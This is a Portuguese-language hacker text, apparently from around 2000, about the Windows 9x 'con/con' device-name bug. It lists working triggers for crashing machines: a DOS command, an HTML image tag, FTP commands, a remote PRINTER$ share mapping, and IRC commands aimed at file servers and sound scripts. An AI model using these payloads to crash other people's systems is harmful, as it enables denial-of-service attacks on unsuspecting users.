Device\device bug

device\device bug
------------------------------------------------------------------------------
Ultimamente o device\device bug vem causando problemas para diversos
usuarios de Win9x que, submitamente, veem seus computadores travarem do nada,
no velho estilo winnuke.

Apesar de ser um bug explorado a um bom tempo no underground, apenas
"recentemente" (6 de Marco, 2k) a galera da Securax Security resolveu
publica-lo.

O bug consiste em uma falha do windows ao tentar abrir arquivos com device
names, como por exemplo CON, NUL, CLOCK$, etc

Esse bug pode ser explorado localmente e remotamente.

--[O bug na pratica]----------------------------------------------------------

As tecnicas abaixo foram amplamente discutidas na BugTraq. Vamos a elas:

- Va no prompt do dos e digite cd con/con

- Em um HTML, use a tag <IMG SRC="file://c:/con/con">
(Nao tentei ainda window.open("file://c:/con/con"). alguem sabe se funfa?)

- em servidores remotos de ftp que rodem win (grande maioria da galera
da dalnet nos canais de foto porno ;), voce pode simplesmente usar o
comando ls con/con

- pessoas com o compartilhamento PRINTER$ tambem pode estar vulneraveis:
c:\ net user f: \\IP_Remoto\\PRINTER$
f:
cd con/con

- links para file://c:/con/con

- Talvez um http://www.servidor.com/..../con/con trave um servidor rodando
o FrontPage WebServer. Nao tive oportunidade de testar esse.

--[Consequencias no IRC]-----------------------------------------------------

Agora vem a batata quente ;)

Muitos usuarios de IRC estao sendo vitimas desse bug. Vamos ver como ele
eh explorado nesse caso:

- Voce tem um fserver e deixa ele servindo fotos aos usuarios do canal
#sexpics, por exemplo. Um usuario mal intencionado simplesmente precisa
usar o comando GET con/con . Seu script simplesmente vai tentar abrir
esse arquivo e seu computador ira travar. (Alguns scripts sao imunes a isso)

- Voce possui um daqueles scripts que tocam musiquinha, envia musiquinha p/
os outros, etc? Ah, que legal esse script neh? Pois eh exatamente ele que
vai te ferrar agora: um usuario mal intencionado pode enviar um comando
/CTCP #canal SOUND con/con.wav
e seu script simplesmente ira tentar abrir o con/con ... O resultado voce
ja sabe.
Alguns outros podem ser travados caso o atacante digite:
!seunick con/con.wav
Isso depende do script.

Vale lembrar que qualquer combinacao de devices funciona (CON\CLOCK$, etc)
------------------------------------------------------------------------------

 
Hosted by www.Geocities.ws

Copyright © Cyber Nine/Crack's S.A todos direitos reservados
Hosted by www.Geocities.ws

Hosted by www.Geocities.ws

Hosted by www.Geocities.ws

1